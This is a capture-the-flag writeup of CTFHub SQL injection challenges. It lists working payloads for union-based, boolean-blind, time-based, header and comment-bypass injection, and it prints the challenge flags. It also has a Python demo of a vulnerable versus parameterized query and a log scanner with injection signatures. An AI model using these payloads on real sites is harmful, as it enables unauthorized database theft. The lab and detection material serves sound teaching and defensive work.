CTFHub Web SQL Injection


Posted by Kyon-H on July 2, 2025

1. SQL Injection

1.1. Integer-type injection

1 # shown
1 and 1=1 # shown
-1 union select 1,2,3 # not shown
-1 union select 1,2 # shown

[screenshot]

Retrieve the database and its tables

[screenshot]

Retrieve the columns of the flag table

[screenshot]

Retrieve the flag

[screenshot]

1.2. String-type injection

# confirm the parameter is string-typed
?id=1' and 1=1--+
?id=1' and 1=-1--+

[screenshots]
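The "shown / not shown" pattern in the integer-type and string-type tests above comes down to how the backend assembles its query. The following Python example is added here and is not code from the writeup or from CTFHub: it uses an in-memory SQLite database with a constructed news table (an assumption, not the challenge's real schema) to run the page's own probes against a handler that concatenates the id into the SQL text and against a hardened handler that validates the id as an integer and binds it as a parameter.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the challenge backend: a 'news' table
    with integer ids (an assumption, not the real CTFHub schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    conn.executemany(
        "INSERT INTO news VALUES (?, ?, ?)",
        [(1, "first post", "hello"), (2, "second post", "world")],
    )
    conn.commit()
    return conn


def query_vulnerable(conn, user_id):
    """Weak pattern: the request parameter is pasted into the SQL text.  With no
    quoting around the value, '1 and 1=1' or '-1 union select 1,2' is parsed as
    SQL, which is exactly what the integer-type probes on this page rely on."""
    sql = f"SELECT title, body FROM news WHERE id = {user_id}"
    return conn.execute(sql).fetchall()


def query_hardened(conn, user_id):
    """Fix: reject anything that is not an integer, then bind the value as a
    parameter so the database driver never treats it as SQL."""
    try:
        id_value = int(user_id)
    except (TypeError, ValueError):
        raise ValueError("id must be an integer")
    sql = "SELECT title, body FROM news WHERE id = ?"
    return conn.execute(sql, (id_value,)).fetchall()


def classify(handler, conn, user_id):
    """Reduce a probe to the page's own 'shown' / 'not shown' observation, plus
    'rejected' for input the hardened handler refuses before touching the DB."""
    try:
        rows = handler(conn, user_id)
    except ValueError:
        return "rejected"
    except sqlite3.Error:  # e.g. a union whose column count does not match
        return "not shown"
    return "shown" if rows else "not shown"


if __name__ == "__main__":
    db = make_db()
    probes = ("1", "1 and 1=1", "1 and 1=-1", "-1 union select 1,2,3", "-1 union select 1,2")
    for probe in probes:
        print(f"{probe!r:28} vulnerable={classify(query_vulnerable, db, probe):10} "
              f"hardened={classify(query_hardened, db, probe)}")
```

Under SQLite the three-column union raises an error where MySQL would also error, so the classify helper reports it as "not shown", matching the page. The hardened handler never reaches the database for non-integer input, so every probe on this page other than a plain id is rejected; error-based injection (section 1.3) depends on MySQL-specific functions, which this stand-in does not reproduce.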

1.3. Error-based injection

[screenshots]

1.4. Boolean-based blind injection

Testing shows the page returns only two responses: query_error and query_success.

Boolean blind injection

1 and (select count(table_name) from information_schema.tables where table_schema=database())=2 -- table count is 2
1 and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))=4 -- table 1 length is 4
1 and length((select table_name from information_schema.tables where table_schema=database() limit 1,1))=4 -- table 2 length is 4

1 and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))=100 -- 

[screenshot]

Table name: flag

1 and (select count(column_name) from information_schema.columns where table_schema=database() and table_name='flag')=1 -- column count is 1
1 and length((select column_name from information_schema.columns where table_schema=database() and table_name='flag' limit 0,1))=4 -- column length is 4

1 and ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name='flag' limit 0,1),1,1))=100 -- 

[screenshot]

Column name: flag

1 and length((select flag from flag limit 0,1))=32 -- 

1 and ascii(substr((select flag from flag limit 0,1),1,1))=100 -- 

[screenshot]

ctfhub{f127288b7d5f415118ee54ed}

1.5. Time-based blind injection

1 and sleep(3) -- numeric injection
1 and if((select count(table_name)from information_schema.tables where table_schema=database())=2,sleep(3),0) -- table count is 2
1 and if(length((select table_name from information_schema.tables where table_schema=database() limit 0,1))=4,sleep(2),0) -- table 1 length is 4
1 and if(length((select table_name from information_schema.tables where table_schema=database() limit 1,1))=4,sleep(2),0) -- table 2 length is 4
1 and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),§1§,1))=§100§,sleep(2),0) -- table 1: news; table 2: flag
1 and if((select count(column_name) from information_schema.columns where table_schema=database() and table_name='flag')=1,sleep(2),0) -- flag table column count is 1
1 and if(length((select column_name from information_schema.columns where table_schema=database() and table_name='flag'))=4,sleep(2),0) -- column 1 length is 4
1 and if(ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name='flag'),§1§,1))=§100§,sleep(2),0) -- column 1 name is flag

1 and if(ascii(substr((select flag from flag),§1§,1))=§100§,sleep(2),0)

[screenshot]

ctfhub{77f14ac024782fa5cb10968e}

1.6. MySQL structure

1 union select 1,2
1 union select 1,2,3

[screenshot]

Confirmed that the query returns two columns

[screenshots]

1.8. UA injection

[screenshots]

1.9. Referer injection

The original request carries no Referer header, so one is added manually.

[screenshots]

1.10. Space filtering

-1 union select 1,2

[screenshot]

-1/**/union/**/select/**/1,2

[screenshot]

-1/**/union/**/select/**/database(),group_concat(table_name)from/**/information_schema.tables/**/where/**/table_schema=database()

[screenshot]

-1/**/union/**/select/**/database(),group_concat(column_name)from/**/information_schema.columns/**/where/**/table_schema=database()/**/and/**/table_name='iwnukmmbul'

[screenshot]

-1/**/union/**/select/**/database(),group_concat(pvrmhtxmxm)from/**/iwnukmmbul

[screenshot]
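The boolean and time-based probes (sections 1.4 and 1.5), the payloads carried in the User-Agent and Referer headers (1.8 and 1.9) and the /**/ space-filter bypass (1.10) all leave recognisable traces in access logs, but only if the detector decodes and normalises each field before matching. The following Python log scanner is an added example, not part of the writeup or of any CTFHub tooling; the combined-format log lines it parses are constructed for the example, and the signature list is an assumption that covers the payload shapes used on this page rather than a complete ruleset.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines in the Apache/nginx "combined" format.  The
# hosts, paths, timestamps and header values are made up for this example.
SAMPLE_LOG = [
    '10.0.0.5 - - [02/Jul/2025:10:00:00 +0000] "GET /index.php?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [02/Jul/2025:10:00:01 +0000] "GET /index.php?id=-1/**/union/**/select/**/1,2 HTTP/1.1" 200 540 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [02/Jul/2025:10:00:02 +0000] "GET /index.php?id=1\'%20and%201=-1--+ HTTP/1.1" 200 300 "-" "Mozilla/5.0"',
    '10.0.0.6 - - [02/Jul/2025:10:00:03 +0000] "GET /index.php?id=1%20and%20if((select%20count(table_name)from%20information_schema.tables%20where%20table_schema=database())=2,sleep(3),0) HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [02/Jul/2025:10:00:04 +0000] "GET /index.php HTTP/1.1" 200 512 "http://example.test/" "Mozilla/5.0\' and 1=1-- "',
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


def normalize(value):
    """Decode and canonicalise a field before matching.  Folding /**/ comments
    to whitespace is what catches the space-filter bypass from section 1.10."""
    text = unquote_plus(value)                 # %20 and '+' become spaces
    text = re.sub(r"/\*.*?\*/", " ", text)     # inline comments act as separators
    text = re.sub(r"\s+", " ", text)           # collapse runs of whitespace
    return text.lower()


# Assumed signature list: enough to recognise the payload shapes in this
# writeup, not a complete or production ruleset.
SIGNATURES = [
    ("union_select",  re.compile(r"\bunion\b.*\bselect\b")),
    ("schema_enum",   re.compile(r"information_schema\.(tables|columns)")),
    ("boolean_probe", re.compile(r"\b(and|or)\b\s*\d+\s*=\s*-?\d+")),
    ("char_extract",  re.compile(r"ascii\s*\(\s*substr\s*\(")),
    ("time_delay",    re.compile(r"\bsleep\s*\(")),
    ("string_break",  re.compile(r"'\s*(and|or)\b")),
]


def scan_line(line):
    """Return None for an unparseable line, else a dict with the client IP,
    status and every (field, signature) pair that matched.  The Referer and
    User-Agent fields are scanned as well, since sections 1.8 and 1.9 show the
    payload arriving in a header rather than in the query string."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    hits = []
    for field in ("path", "referer", "ua"):
        text = normalize(m.group(field))
        for name, pattern in SIGNATURES:
            if pattern.search(text):
                hits.append((field, name))
    return {"ip": m.group("ip"), "status": m.group("status"), "hits": hits}


def scan_log(lines):
    """Scan every line, dropping the ones that do not parse."""
    results = [scan_line(line) for line in lines]
    return [r for r in results if r is not None]


def flagged(results):
    """Only the entries with at least one signature hit."""
    return [r for r in results if r["hits"]]


if __name__ == "__main__":
    for entry in flagged(scan_log(SAMPLE_LOG)):
        print(entry["ip"], entry["status"], entry["hits"])
```

The normalize step is the part that matters for section 1.10: a filter or detector that looks for a literal space before union never sees /**/union, so comments are folded to whitespace first and URL encoding is undone. The boolean_probe pattern will also fire on harmless text containing "and 1=1", so in practice hits are correlated per client IP and over time (the sleep(3) probes in section 1.5 additionally show up as unusually slow responses) rather than alerted on individually.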